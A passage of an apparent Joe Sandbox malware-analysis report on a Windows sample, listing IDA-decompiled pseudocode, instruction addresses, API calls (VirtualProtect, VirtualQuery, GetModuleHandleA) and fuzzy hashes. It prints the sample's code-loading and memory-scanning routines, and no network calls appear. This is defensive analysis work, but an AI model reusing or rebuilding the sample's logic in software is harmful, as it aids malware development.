												_push(1);
												_pop(__eax);
											} else {
												goto L51;
											}
										}
									}
									goto L77;
								}
							}
							goto L76;
						case 4:
							 *(__ebx + 0x94) =  &(( *(__ebx + 0x94))[ *(__esi + 4)]);
							__eax = IsBadCodePtr( &(( *(__ebx + 0x94))[ *(__esi + 4)]));
							__eflags = __eax;
							if(__eax != 0) {
								goto L76;
							} else {
								__eax =  *(__esi + 0xc);
								__eflags = __eax;
								if(__eax == 0) {
									goto L76;
								} else {
									__ebx =  *(__ebx + 0xa8);
									__ecx =  &_a4;
									__eax = VirtualProtect(__ebx, __eax,  *(__esi + 0x10),  &_a4); // executed
								}
							}
							goto L77;
						case 5:
							__eax = E00401F95( *(__esi + 4), 4, __edi);
							__eflags = __eax;
							if(__eax != 0) {
								goto L76;
							} else {
								__eax = E00401F78( *(__esi + 4), __edi);
								_pop(__ecx);
								_pop(__ecx);
								__eax = GetModuleHandleA(__eax);
								__ecx = 0;
								 *(__ebx + 0x94) = __eax;
								__eflags = __eax;
								__ecx = 0 | __eflags != 0x00000000;
								__eax = __eflags != 0;
							}
							goto L77;
						case 6:
							__eax = E00401F95( *(__esi + 0xc),  *(__esi + 0x10), __edi);
							__eflags = __eax;
							if(__eax != 0) {
								goto L76;
							} else {
								__eax =  *(__esi + 8);
								__eflags = __eax;
								_a4 = __eax;
								if(__eax < 0) {
									goto L76;
								} else {
									E00401F78( *(__esi + 0xc), __edi) = E00403A07(__ebx,  *(__esi + 4), _a4, __eax,  *(__esi + 0x10));
								}
							}
							goto L77;
						case 7:
							__eax =  *(__esi + 4);
							__eflags = __eax - 0xffffffff;
							if(__eax != 0xffffffff) {
								__eflags = __eax - 0xfffffffe;
								if(__eax != 0xfffffffe) {
									__eax =  *(__esi + 8);
									_a4 =  *(__esi + 8);
									_v8 = E00401F78( *(__esi + 0xc), __edi);
									__eax =  *(__esi + 0x10);
									_a8 =  *(__esi + 0x10);
									__eax = E00401F95( *(__esi + 0xc),  *(__esi + 0x10), __edi);
									__eflags = __eax;
									if(__eax == 0) {
										__ecx = _a4;
										__eflags = __ecx;
										if(__ecx >= 0) {
											__esi =  *(__esi + 4);
											_t57 = __ebx + 0x50; // 0x50
											__eax = _t57;
											__eflags = __eax -  *__eax;
											if(__eax !=  *__eax) {
												__ebx =  *(__ebx + 0x54);
												while(1) {
													__eflags = __ebx - __eax;
													if(__ebx == __eax) {
														goto L76;
													}
													__eflags =  *((intOrPtr*)(__ebx + 8)) - __esi;
													if( *((intOrPtr*)(__ebx + 8)) == __esi) {
														__eax =  *(__ebx + 0x10);
														__esi = _a8;
														__ebx =  *(__ebx + 0xc);
														__eax = __eax - __ecx;
														__eflags = __esi - __eax;
														if(__esi >= __eax) {
															__esi = __eax;
														}
														__ebx = __ebx + __ecx;
														__eflags = __ebx;
														_push(__esi);
														_push(__ebx);
														_push(_v8);
														goto L36;
													} else {
														__ebx =  *(__ebx + 4);
														continue;
													}
													goto L77;
												}
											}
										}
									}
									goto L76;
								} else {
									__eflags =  *(__ebx + 0x98);
									if( *(__ebx + 0x98) == 0) {
										goto L76;
									} else {
										__eax =  *(__esi + 8);
										_a4 =  *(__esi + 8);
										_v8 = E00401F78( *(__esi + 0xc), __edi);
										__eax =  *(__esi + 0x10);
										_a8 =  *(__esi + 0x10);
										__eax = E00401F95( *(__esi + 0xc),  *(__esi + 0x10), __edi);
										__eflags = __eax;
										if(__eax != 0) {
											goto L76;
										} else {
											__ecx = _a4;
											__eflags = __ecx;
											if(__ecx < 0) {
												goto L76;
											} else {
												__eax =  *(__ebx + 0x9c);
												__esi = _a8;
												__eax =  *(__ebx + 0x9c) - __ecx;
												__eflags = __esi - __eax;
												if(__esi >= __eax) {
													__esi = __eax;
												}
												__ecx =  &(__ecx[ *(__ebx + 0x98)]);
												_push(__esi);
												_push(__ecx);
												_push(_v8);
												L36:
												__eax = E00403EE0();
												__esp = __esp + 0xc;
												__eax = __esi;
											}
										}
									}
								}
							} else {
								__eflags =  *(__ebx + 0x94);
								if( *(__ebx + 0x94) == 0) {
									goto L76;
								} else {
									__eax =  *(__esi + 8);
									_a4 =  *(__esi + 8);
									_v8 = E00401F78( *(__esi + 0xc), __edi);
									__eax =  *(__esi + 0x10);
									_a8 =  *(__esi + 0x10);
									__eax = E00401F95( *(__esi + 0xc),  *(__esi + 0x10), __edi);
									__eflags = __eax;
									if(__eax != 0) {
										goto L76;
									} else {
										__eflags = _a4 - __eax;
										if(_a4 < __eax) {
											goto L76;
										} else {
											 *(__ebx + 0x94) =  &(( *(__ebx + 0x94))[_a4]);
											E00403EE0(_v8,  &(( *(__ebx + 0x94))[_a4]), _a8) = _a8;
										}
									}
								}
							}
							goto L77;
						case 8:
							__eax = E004039BF(__ebx,  *(__esi + 4));
							goto L13;
						case 9:
							__esi =  *(__esi + 4);
							__eflags = __esi;
							if(__esi <= 0) {
								__eax = __eax | 0xffffffff;
							} else {
								__eax = E00403968(__ebx, __esi);
								L13:
								_pop(__ecx);
								_pop(__ecx);
							}
							goto L77;
						case 0xa:
							__eax = E00401F95( *(__esi + 4),  *(__esi + 0xc), __edi);
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00401F95( *(__esi + 8),  *(__esi + 0xc), __edi);
								__eflags = __eax;
								if(__eax == 0) {
									_push( *(__esi + 0xc));
									__eax = E00401F78( *(__esi + 8), __edi);
									_pop(__ecx);
									_pop(__ecx);
									_push(__eax);
									__eax = E00401F78( *(__esi + 4), __edi);
									_pop(__ecx);
									_pop(__ecx);
									_push(__eax);
									__eax = E00403EE0();
									goto L7;
								}
							}
							goto L8;
						case 0xb:
							if(E00401F95( *((intOrPtr*)(_t158 + 4)),  *((intOrPtr*)(_t158 + 0xc)), _t155) == 0) {
								E00404560(E00401F78( *((intOrPtr*)(_t158 + 4)), _t155),  *((intOrPtr*)(_t158 + 8)),  *((intOrPtr*)(_t158 + 0xc)));
								L7:
							}
							L8:
							_t144 =  *((intOrPtr*)(_t158 + 4));
							goto L77;
					}
				}
				L77:
				return _t144;
			}









                                                                  0x0040348a
                                                                  0x0040348e
                                                                  0x00403493
                                                                  0x00403494
                                                                  0x0040349b
                                                                  0x00403931
                                                                  0x00403931
                                                                  0x004034a1
                                                                  0x004034a1
                                                                  0x00000000
                                                                  0x00403882
                                                                  0x00403885
                                                                  0x00403888
                                                                  0x0040388e
                                                                  0x00403890
                                                                  0x00403892
                                                                  0x00403894
                                                                  0x00403897
                                                                  0x00403897
                                                                  0x0040389a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040389c
                                                                  0x0040389d
                                                                  0x004038a0
                                                                  0x004038a2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004038a2
                                                                  0x00403897
                                                                  0x004038a4
                                                                  0x004038a4
                                                                  0x004038a6
                                                                  0x004038ac
                                                                  0x004038b6
                                                                  0x004038c3
                                                                  0x004038c5
                                                                  0x004038c7
                                                                  0x004038c9
                                                                  0x004038cd
                                                                  0x004038d1
                                                                  0x004038d3
                                                                  0x004038d6
                                                                  0x004038d9
                                                                  0x004038dc
                                                                  0x004038e1
                                                                  0x004038e6
                                                                  0x004038e7
                                                                  0x004038e9
                                                                  0x004038ea
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004038ec
                                                                  0x004038ef
                                                                  0x004038f1
                                                                  0x004038f2
                                                                  0x004038f4
                                                                  0x004038f7
                                                                  0x004038f8
                                                                  0x004038fb
                                                                  0x004038fb
                                                                  0x004038ff
                                                                  0x00403900
                                                                  0x00403901
                                                                  0x00403904
                                                                  0x0040390a
                                                                  0x0040390f
                                                                  0x00403913
                                                                  0x00403916
                                                                  0x00403919
                                                                  0x0040391c
                                                                  0x0040391f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040391f
                                                                  0x004038d9
                                                                  0x00403921
                                                                  0x00403921
                                                                  0x00403924
                                                                  0x00403927
                                                                  0x00403929
                                                                  0x0040392c
                                                                  0x0040392f
                                                                  0x0040392f
                                                                  0x004038c7
                                                                  0x004038a6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403817
                                                                  0x0040381f
                                                                  0x00403821
                                                                  0x00000000
                                                                  0x00403827
                                                                  0x00403827
                                                                  0x0040382d
                                                                  0x00000000
                                                                  0x00403833
                                                                  0x00403833
                                                                  0x0040383a
                                                                  0x0040383d
                                                                  0x00403842
                                                                  0x00403848
                                                                  0x0040384b
                                                                  0x0040384e
                                                                  0x00403852
                                                                  0x00403853
                                                                  0x00403855
                                                                  0x00403856
                                                                  0x00000000
                                                                  0x0040385c
                                                                  0x0040385f
                                                                  0x00403865
                                                                  0x00403867
                                                                  0x00000000
                                                                  0x0040386d
                                                                  0x0040386e
                                                                  0x00403874
                                                                  0x00403876
                                                                  0x00403878
                                                                  0x00403878
                                                                  0x0040387a
                                                                  0x0040387b
                                                                  0x0040387c
                                                                  0x00000000
                                                                  0x0040387c
                                                                  0x00403867
                                                                  0x00403856
                                                                  0x0040382d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004037c2
                                                                  0x004037c5
                                                                  0x004037cc
                                                                  0x004037d2
                                                                  0x004037d4
                                                                  0x00000000
                                                                  0x004037da
                                                                  0x004037da
                                                                  0x004037df
                                                                  0x004037e6
                                                                  0x004037ec
                                                                  0x004037ee
                                                                  0x00000000
                                                                  0x004037f4
                                                                  0x004037f4
                                                                  0x004037f5
                                                                  0x004037fb
                                                                  0x004037fd
                                                                  0x004037ff
                                                                  0x00000000
                                                                  0x00403805
                                                                  0x00403805
                                                                  0x00403805
                                                                  0x004037ff
                                                                  0x004037ee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403760
                                                                  0x00403763
                                                                  0x00403765
                                                                  0x0040376b
                                                                  0x0040376e
                                                                  0x0040376e
                                                                  0x00403770
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403776
                                                                  0x00403779
                                                                  0x0040377c
                                                                  0x004037a3
                                                                  0x004037a3
                                                                  0x004037a6
                                                                  0x00000000
                                                                  0x0040377e
                                                                  0x0040377e
                                                                  0x00403785
                                                                  0x00000000
                                                                  0x00403787
                                                                  0x0040378c
                                                                  0x00403793
                                                                  0x00403799
                                                                  0x0040379b
                                                                  0x004037a1
                                                                  0x004037b2
                                                                  0x004037ba
                                                                  0x004037bc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004037a1
                                                                  0x00403785
                                                                  0x00000000
                                                                  0x0040377c
                                                                  0x0040376e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040372a
                                                                  0x0040372e
                                                                  0x00403734
                                                                  0x00403736
                                                                  0x00000000
                                                                  0x0040373c
                                                                  0x0040373c
                                                                  0x0040373f
                                                                  0x00403741
                                                                  0x00000000
                                                                  0x00403747
                                                                  0x00403747
                                                                  0x0040374d
                                                                  0x00403759
                                                                  0x00403759
                                                                  0x00403741
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004036ee
                                                                  0x004036f6
                                                                  0x004036f8
                                                                  0x00000000
                                                                  0x004036fe
                                                                  0x00403702
                                                                  0x00403707
                                                                  0x00403708
                                                                  0x0040370a
                                                                  0x00403710
                                                                  0x00403712
                                                                  0x00403718
                                                                  0x0040371a
                                                                  0x0040371d
                                                                  0x0040371d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004036a9
                                                                  0x004036b1
                                                                  0x004036b3
                                                                  0x00000000
                                                                  0x004036b9
                                                                  0x004036b9
                                                                  0x004036bc
                                                                  0x004036be
                                                                  0x004036c1
                                                                  0x00000000
                                                                  0x004036c7
                                                                  0x004036db
                                                                  0x004036e0
                                                                  0x004036c1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040354d
                                                                  0x00403550
                                                                  0x00403553
                                                                  0x004035b8
                                                                  0x004035bb
                                                                  0x00403620
                                                                  0x00403627
                                                                  0x0040362f
                                                                  0x00403632
                                                                  0x0040363a
                                                                  0x0040363d
                                                                  0x00403645
                                                                  0x00403647
                                                                  0x0040364d
                                                                  0x00403650
                                                                  0x00403652
                                                                  0x00403658
                                                                  0x0040365b
                                                                  0x0040365b
                                                                  0x0040365e
                                                                  0x00403660
                                                                  0x00403666
                                                                  0x00403669
                                                                  0x00403669
                                                                  0x0040366b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403671
                                                                  0x00403674
                                                                  0x0040367b
                                                                  0x0040367e
                                                                  0x00403681
                                                                  0x00403684
                                                                  0x00403686
                                                                  0x00403688
                                                                  0x0040368a
                                                                  0x0040368a
                                                                  0x0040368c
                                                                  0x0040368c
                                                                  0x0040368e
                                                                  0x0040368f
                                                                  0x00403690
                                                                  0x00000000
                                                                  0x00403676
                                                                  0x00403676
                                                                  0x00000000
                                                                  0x00403676
                                                                  0x00000000
                                                                  0x00403674
                                                                  0x00403669
                                                                  0x00403660
                                                                  0x00403652
                                                                  0x00000000
                                                                  0x004035bd
                                                                  0x004035bd
                                                                  0x004035c4
                                                                  0x00000000
                                                                  0x004035ca
                                                                  0x004035ca
                                                                  0x004035d1
                                                                  0x004035d9
                                                                  0x004035dc
                                                                  0x004035e4
                                                                  0x004035e7
                                                                  0x004035ef
                                                                  0x004035f1
                                                                  0x00000000
                                                                  0x004035f7
                                                                  0x004035f7
                                                                  0x004035fa
                                                                  0x004035fc
                                                                  0x00000000
                                                                  0x00403602
                                                                  0x00403602
                                                                  0x00403608
                                                                  0x0040360b
                                                                  0x0040360d
                                                                  0x0040360f
                                                                  0x00403611
                                                                  0x00403611
                                                                  0x00403613
                                                                  0x00403619
                                                                  0x0040361a
                                                                  0x0040361b
                                                                  0x00403693
                                                                  0x00403693
                                                                  0x00403698
                                                                  0x0040369b
                                                                  0x0040369b
                                                                  0x004035fc
                                                                  0x004035f1
                                                                  0x004035c4
                                                                  0x00403555
                                                                  0x00403555
                                                                  0x0040355c
                                                                  0x00000000
                                                                  0x00403562
                                                                  0x00403562
                                                                  0x00403569
                                                                  0x00403571
                                                                  0x00403574
                                                                  0x0040357c
                                                                  0x0040357f
                                                                  0x00403587
                                                                  0x00403589
                                                                  0x00000000
                                                                  0x0040358f
                                                                  0x0040358f
                                                                  0x00403592
                                                                  0x00000000
                                                                  0x00403598
                                                                  0x004035a1
                                                                  0x004035ad
                                                                  0x004035b0
                                                                  0x00403592
                                                                  0x00403589
                                                                  0x0040355c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403525
                                                                  0x00403528
                                                                  0x0040352a
                                                                  0x00403535
                                                                  0x0040352c
                                                                  0x0040352e
                                                                  0x00403546
                                                                  0x00403546
                                                                  0x00403547
                                                                  0x00403547
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004034db
                                                                  0x004034e3
                                                                  0x004034e5
                                                                  0x004034ee
                                                                  0x004034f6
                                                                  0x004034f8
                                                                  0x004034fa
                                                                  0x00403501
                                                                  0x00403506
                                                                  0x00403507
                                                                  0x00403508
                                                                  0x0040350d
                                                                  0x00403512
                                                                  0x00403513
                                                                  0x00403514
                                                                  0x00403515
                                                                  0x00000000
                                                                  0x00403515
                                                                  0x004034f8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004034b9
                                                                  0x004034cd
                                                                  0x0040351a
                                                                  0x0040351a
                                                                  0x0040351d
                                                                  0x0040351d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004034a1
                                                                  0x00403933
                                                                  0x00403937

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0040370A
                                                                  • IsBadCodePtr.KERNEL32 ref: 0040372E
                                                                  • VirtualProtect.KERNEL32(00000000,00000000,?,00000000), ref: 00403759
                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040378C
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00403793
                                                                  • IsBadCodePtr.KERNEL32 ref: 004037CC
                                                                  • IsBadReadPtr.KERNEL32(?,0000000A), ref: 004037E6
                                                                  • IsBadStringPtrA.KERNEL32 ref: 0040385F
                                                                  • lstrlenA.KERNEL32(?), ref: 0040386E
                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 004038B6
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004038BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CodeProcess$AllocAllocateHandleModuleProtectReadStringVirtuallstrlen
                                                                  • String ID:
                                                                  • API String ID: 364746606-0
                                                                  • Opcode ID: b0df6a4af5d37c2887d2ee7b8261e7d7477fae441ab67b6e8b74700aad9fecfc
                                                                  • Instruction ID: d4e7ca000d37341421eda4d9ef2a8fa6cf2d9c569afbd62ea946de4b0f8709bb
                                                                  • Opcode Fuzzy Hash: b0df6a4af5d37c2887d2ee7b8261e7d7477fae441ab67b6e8b74700aad9fecfc
                                                                  • Instruction Fuzzy Hash: DBE1C0B1500201AFDB209F65CC84E6B7BB9EF40355B14843EFC5AAB2B1E779EA10CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404608 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 81%
                                                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				struct HINSTANCE__* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				struct HINSTANCE__* _t28;
				void* _t31;
				signed int _t34;
				intOrPtr _t51;

				_t46 = __edi;
				_push(0xffffffff);
				_push(0x42bb58);
				_push(E00405B04);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t51;
				_push(__edi);
				_v28 = _t51 - 0x58;
				_t15 = GetVersion();
				 *0x42fe50 = 0;
				_t34 = _t15 & 0x000000ff;
				 *0x42fe4c = _t34;
				 *0x42fe48 = _t34 << 8;
				 *0x42fe44 = _t15 >> 0x10;
				if(E004059AC(_t34 << 8, 1) == 0) {
					E00404735(0x1c);
				}
				if(E004049E6() == 0) {
					E00404735(0x10);
				}
				_v8 = 0;
				E0040567B();
				 *0x4304f4 = GetCommandLineA();
				 *0x42fe30 = E00405549();
				E004052FC();
				E00405243();
				E00404F53();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004051EB();
				_t55 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t27);
				_t28 = GetModuleHandleA(0);
				E00402E73(_t28, 0, _v104); // executed
				_v100 = _t28;
				E00404F80(_t28);
				_v108 =  *((intOrPtr*)( *_v24));
				_t31 = E00405073(_t46, _t55,  *((intOrPtr*)( *_v24)), _v24); // executed
				return _t31;
			}
















                                                                  0x00404608
                                                                  0x0040460b
                                                                  0x0040460d
                                                                  0x00404612
                                                                  0x0040461d
                                                                  0x0040461e
                                                                  0x0040462a
                                                                  0x0040462b
                                                                  0x0040462e
                                                                  0x00404638
                                                                  0x00404640
                                                                  0x00404646
                                                                  0x00404651
                                                                  0x0040465a
                                                                  0x00404669
                                                                  0x0040466d
                                                                  0x00404672
                                                                  0x0040467a
                                                                  0x0040467e
                                                                  0x00404683
                                                                  0x00404686
                                                                  0x00404689
                                                                  0x00404694
                                                                  0x0040469e
                                                                  0x004046a3
                                                                  0x004046a8
                                                                  0x004046ad
                                                                  0x004046b2
                                                                  0x004046b9
                                                                  0x004046c4
                                                                  0x004046c7
                                                                  0x004046cb
                                                                  0x004046d5
                                                                  0x004046cd
                                                                  0x004046cd
                                                                  0x004046cd
                                                                  0x004046d6
                                                                  0x004046dc
                                                                  0x004046e3
                                                                  0x004046e8
                                                                  0x004046ec
                                                                  0x004046f8
                                                                  0x004046fd
                                                                  0x00404704

                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 0040462E
                                                                    • Part of subcall function 004059AC: HeapCreate.KERNEL32(00000000,00001000,00000000,00404666,00000001), ref: 004059BD
                                                                    • Part of subcall function 004059AC: HeapDestroy.KERNEL32 ref: 004059FC
                                                                  • GetCommandLineA.KERNEL32 ref: 0040468E
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004046B9
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004046DC
                                                                    • Part of subcall function 00404735: ExitProcess.KERNEL32 ref: 00404752
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                  • String ID: X3S
                                                                  • API String ID: 2057626494-2615657316
                                                                  • Opcode ID: 5a8f0244166eb74224e7ecdc227515b76bd6e8231203bdf0ced84a91ec7cb250
                                                                  • Instruction ID: 8468a1c2298d7b002819d30460bbe095b20ba2d21abfb9e7ddbeb3ac69abfe4f
                                                                  • Opcode Fuzzy Hash: 5a8f0244166eb74224e7ecdc227515b76bd6e8231203bdf0ced84a91ec7cb250
                                                                  • Instruction Fuzzy Hash: 7D2181B0D407059BD714AFA5DC06B6E77B8EF41704F50053EFA04BA2E1DB7C48408B99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403317 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 248 403317-40332a 249 403330-403364 call 401cd7 248->249 250 40347f-403483 248->250 249->250 253 40336a-403377 call 401f24 249->253 256 403469-403471 253->256 257 40337d-403385 253->257 258 403476-40347c call 4014dd 256->258 259 403452-403457 257->259 260 40338b-4033a7 GetSystemInfo VirtualQuery 257->260 258->250 261 40345e-403467 259->261 260->259 263 4033ad-4033b4 260->263 261->258 264 4033b6-4033c4 KiUserExceptionDispatcher 263->264 265 40342f-403447 VirtualQuery 263->265 264->265 267 4033c6 264->267 265->263 268 40344d-403450 265->268 269 4033c9-4033ce 267->269 268->259 270 403459 268->270 271 4033d0-4033d6 269->271 272 403429-40342d 269->272 270->261 273 403418-40341e 271->273 274 4033d8-4033db 271->274 272->265 272->270 276 403420-403423 273->276 277 403425 273->277 275 4033de-4033ed 274->275 278 403407-403414 275->278 279 4033ef-403402 call 4013ee 275->279 276->269 277->272 278->275 281 403416 278->281 279->278 283 403404 279->283 281->273 283->278
                                                                  C-Code - Quality: 61%
                                                                  			E00403317(void* __ecx, intOrPtr _a4, signed int _a7) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				intOrPtr _t44;
				intOrPtr _t45;
				signed int _t46;
				void* _t49;
				long _t52;
				void* _t54;
				void* _t61;
				intOrPtr _t62;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				intOrPtr _t72;
				void* _t73;
				void* _t74;

				_t44 = _a4;
				_t62 =  *((intOrPtr*)(_t44 + 4));
				_t68 = 0;
				if(_t62 == 0) {
					L27:
					return _t44;
				}
				 *((intOrPtr*)(_t62 + 0x98)) = 0x40b1c4;
				_t45 =  *0x40b1c0; // 0x1a413
				 *((intOrPtr*)(_t62 + 0x9c)) = _t45;
				_t71 = _t62 + 0x60;
				_t44 = E00401CD7(_t45, __ecx, _t62 + 0x60, _t62, 0x40a17c,  *0x40a178, E00403484);
				_t74 = _t73 + 0x14;
				if(_t44 != 0) {
					goto L27;
				}
				_t46 = E00401F24(_t44, _t71, 3);
				if(_t46 != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push(0x96);
					_push(E00403B4B);
					L26:
					_push(_t62);
					return E004014DD();
				}
				_a7 = _t46;
				if(_t62 + 0x58 ==  *((intOrPtr*)(_t62 + 0x58))) {
					L22:
					_t49 = E00403A54;
					L24:
					_push(_t68);
					_push(_t68);
					_push(_t68);
					_push(0x96);
					_push(_t49);
					goto L26;
				}
				GetSystemInfo( &_v80); // executed
				_v12 = 0;
				_t52 = VirtualQuery(0,  &_v44, 0x1c);
				if(_t52 == 0) {
					goto L22;
				} else {
					goto L5;
				}
				do {
					L5:
					if(_v44.State != 0x1000) {
						goto L20;
					}
					KiUserExceptionDispatcher(_v12, _v44.RegionSize); // executed
					if(_t52 != 0) {
						goto L20;
					}
					_t72 =  *((intOrPtr*)(_t62 + 0x5c));
					while(_t72 != _t62 + 0x58) {
						_v8 = _t68;
						if( *((intOrPtr*)(_t72 + 0x10)) <= _t68) {
							L16:
							if( *(_t72 + 8) ==  *((intOrPtr*)(_t72 + 0xc))) {
								_a7 = _a7 & 0x00000000;
								break;
							}
							_t72 =  *((intOrPtr*)(_t72 + 4));
							continue;
						}
						_v16 = _t72 + 0x14;
						do {
							_t67 = _v8;
							_t69 = 1;
							_t70 = _t69 << _v8;
							if(( *(_t72 + 8) & _t70) != _t70) {
								_t61 = E004013EE(_t67, _v16, _v12, _v44.RegionSize);
								_t74 = _t74 + 0xc;
								if(_t61 != 0) {
									 *(_t72 + 8) =  *(_t72 + 8) | _t70;
								}
							}
							_v8 = _v8 + 1;
							_v16 = _v16 + 8;
						} while (_v8 <  *((intOrPtr*)(_t72 + 0x10)));
						_t68 = 0;
						goto L16;
					}
					if(_a7 == 0) {
						L23:
						_t49 = E00403B4B;
						goto L24;
					}
					L20:
					_t54 = _v12 + _v44.RegionSize;
					_v12 = _t54;
					_t52 = VirtualQuery(_t54,  &_v44, 0x1c);
				} while (_t52 != 0);
				if(_a7 == _t52) {
					goto L23;
				}
				goto L22;
			}






















                                                                  0x0040331d
                                                                  0x00403323
                                                                  0x00403326
                                                                  0x0040332a
                                                                  0x00403483
                                                                  0x00403483
                                                                  0x00403483
                                                                  0x00403330
                                                                  0x0040333a
                                                                  0x00403344
                                                                  0x00403350
                                                                  0x0040335a
                                                                  0x0040335f
                                                                  0x00403364
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040336d
                                                                  0x00403377
                                                                  0x00403469
                                                                  0x0040346a
                                                                  0x0040346b
                                                                  0x0040346c
                                                                  0x00403471
                                                                  0x00403476
                                                                  0x00403476
                                                                  0x00000000
                                                                  0x0040347c
                                                                  0x0040337d
                                                                  0x00403385
                                                                  0x00403452
                                                                  0x00403452
                                                                  0x0040345e
                                                                  0x0040345e
                                                                  0x0040345f
                                                                  0x00403460
                                                                  0x00403461
                                                                  0x00403466
                                                                  0x00000000
                                                                  0x00403466
                                                                  0x0040338f
                                                                  0x0040339c
                                                                  0x0040339f
                                                                  0x004033a7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004033ad
                                                                  0x004033ad
                                                                  0x004033b4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004033bc
                                                                  0x004033c4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004033c6
                                                                  0x004033c9
                                                                  0x004033d3
                                                                  0x004033d6
                                                                  0x00403418
                                                                  0x0040341e
                                                                  0x00403425
                                                                  0x00000000
                                                                  0x00403425
                                                                  0x00403420
                                                                  0x00000000
                                                                  0x00403420
                                                                  0x004033db
                                                                  0x004033de
                                                                  0x004033de
                                                                  0x004033e6
                                                                  0x004033e7
                                                                  0x004033ed
                                                                  0x004033f8
                                                                  0x004033fd
                                                                  0x00403402
                                                                  0x00403404
                                                                  0x00403404
                                                                  0x00403402
                                                                  0x00403407
                                                                  0x0040340a
                                                                  0x00403411
                                                                  0x00403416
                                                                  0x00000000
                                                                  0x00403416
                                                                  0x0040342d
                                                                  0x00403459
                                                                  0x00403459
                                                                  0x00000000
                                                                  0x00403459
                                                                  0x0040342f
                                                                  0x00403435
                                                                  0x0040343c
                                                                  0x0040343f
                                                                  0x00403445
                                                                  0x00403450
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040338F
                                                                  • VirtualQuery.KERNEL32(00000000,?,0000001C), ref: 0040339F
                                                                  • KiUserExceptionDispatcher.NTDLL(?,?), ref: 004033BC
